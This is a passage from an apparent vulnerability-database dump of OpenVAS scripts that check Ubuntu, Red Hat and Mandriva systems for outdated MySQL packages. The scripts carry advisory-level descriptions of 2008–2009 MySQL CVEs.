(CVE-2008-4456)\n \n It was discovered that MySQL could be made to overwrite existing table\n files in the data directory. An authenticated user could use symlinks\n combined with the DATA DIRECTORY and INDEX DIRECTORY options to possibly\n bypass privilege checks. This issue only affected Ubuntu 9.10.\n (CVE-2008-7247)\n \n It was discovered that MySQL contained multiple format string flaws when\n logging database creation and deletion. An authenticated user could use\n specially crafted database names to make MySQL crash, causing a denial of\n service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04.\n (CVE-2009-2446)\n \n It was discovered that MySQL incorrectly handled errors when performing\n certain SELECT statements, and did not preserve correct flags when\n performing statements that use the GeomFromWKB function. An authenticated\n user could exploit this to make MySQL crash, causing a denial of service.\n (CVE-2009-4019)\n \n It was discovered that MySQL incorrectly checked symlinks when using the\n DATA DIRECTORY and INDEX DIRECTORY options. A local user could use symlinks\n to create tables that pointed to tables known to be created at a later\n time, bypassing access restrictions. (CVE-2009-4030)\n \n It was discovered that MySQL contained a buffer overflow when parsing\n ssl certificates. A remote attacker could send crafted requests and cause a\n denial of service or possibly execute arbitrary code. This issue did not\n affect Ubuntu 6.06 LTS and the default compiler options for affected\n releases should reduce the vulnerability to a denial of service. In the\n default installation, attackers would also be isolated by the AppArmor\n MySQL profile. (CVE-2009-4484)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-897-1\";\ntag_affected = \"MySQL vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-897-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840384\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"897-1\");\n script_cve_id(\"CVE-2008-4098\", \"CVE-2008-4456\", \"CVE-2008-7247\", \"CVE-2009-2446\", \"CVE-2009-4019\", \"CVE-2009-4030\", \"CVE-2009-4484\");\n script_name(\"Ubuntu Update for MySQL vulnerabilities USN-897-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-core-5.0\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16-dev\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:10:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "description": "Check for the Version of mysql", "modified": "2017-12-08T00:00:00", "published": "2010-02-19T00:00:00", "id": "OPENVAS:870216", "href": "http://plugins.openvas.org/nasl.php?oid=870216", "type": "openvas", "title": "RedHat Update for mysql RHSA-2010:0109-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for mysql RHSA-2010:0109-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n It was discovered that the MySQL client ignored certain SSL certificate\n verification errors when connecting to servers. A man-in-the-middle\n attacker could use this flaw to trick MySQL clients into connecting to a\n spoofed MySQL server. (CVE-2009-4028)\n \n Note: This fix may uncover previously hidden SSL configuration issues, such\n as incorrect CA certificates being used by clients or expired server\n certificates. This update should be carefully tested in deployments where\n SSL connections are used.\n \n A flaw was found in the way MySQL handled SELECT statements with subqueries\n in the WHERE clause, that assigned results to a user variable. A remote,\n authenticated attacker could use this flaw to crash the MySQL server daemon\n (mysqld). This issue only caused a temporary denial of service, as the\n MySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n \n When the "datadir" option was configured with a relative path, MySQL did\n not properly check paths used as arguments for the DATA DIRECTORY and INDEX\n DIRECTORY directives. An authenticated attacker could use this flaw to\n bypass the restriction preventing the use of subdirectories of the MySQL\n data directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n (CVE-2009-4030)\n \n Note: Due to the security risks and previous security issues related to the\n use of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\n depending on this feature should consider disabling it by adding\n "symbolic-links=0" to the "[mysqld]" section of the "my.cnf" configuration\n file. In this update, an example of such a configuration was added to the\n default "my.cnf" file.\n \n All MySQL users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. After installing this\n update, the MySQL server daemon (mysqld) will be restarted automatically.\";\n\ntag_affected = \"mysql on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-February/msg00008.html\");\n script_id(870216);\n script_version(\"$Revision: 8037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 07:32:03 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-19 13:38:15 +0100 (Fri, 19 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0109-01\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\", \"CVE-2008-2079\", \"CVE-2008-4098\");\n script_name(\"RedHat Update for mysql RHSA-2010:0109-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-debuginfo\", rpm:\"mysql-debuginfo~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "description": "Check for the Version of mysql", "modified": "2017-12-26T00:00:00", "published": "2010-01-19T00:00:00", "id": "OPENVAS:830821", "href": "http://plugins.openvas.org/nasl.php?oid=830821", "type": "openvas", "title": "Mandriva Update for mysql MDVSA-2010:011 (mysql)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mysql MDVSA-2010:011 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in mysql:\n\n mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does\n not (1) properly handle errors during execution of certain SELECT\n statements with subqueries, and does not (2) preserve certain\n null_value flags during execution of statements that use the\n GeomFromWKB function, which allows remote authenticated users to\n cause a denial of service (daemon crash) via a crafted statement\n (CVE-2009-4019).\n \n The vio_verify_callback function in viosslfactories.c in MySQL\n 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used,\n accepts a value of zero for the depth of X.509 certificates, which\n allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL\n servers via a crafted certificate, as demonstrated by a certificate\n presented by a server linked against the yaSSL library (CVE-2009-4028).\n \n MySQL 5.1.x before 5.1.41 allows local users to bypass certain\n privilege checks by calling CREATE TABLE on a MyISAM table with\n modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments\n that are originally associated with pathnames without symlinks,\n and that can point to tables created at a future time at which a\n pathname is modified to contain a symlink to a subdirectory of the\n MySQL data home directory, related to incorrect calculation of the\n mysql_unpacked_real_data_home value. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\n (CVE-2009-4030).\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\n \n The updated packages have been patched to correct these\n issues. Additionally for 2009.0 and MES5 mysql has also been upgraded\n to the last stable 5.0 release (5.0.89).\";\n\ntag_affected = \"mysql on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00052.php\");\n script_id(830821);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-19 08:58:46 +0100 (Tue, 19 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:011\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2008-4098\", \"CVE-2008-2079\", \"CVE-2009-4030\");\n script_name(\"Mandriva Update for mysql MDVSA-2010:011 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", 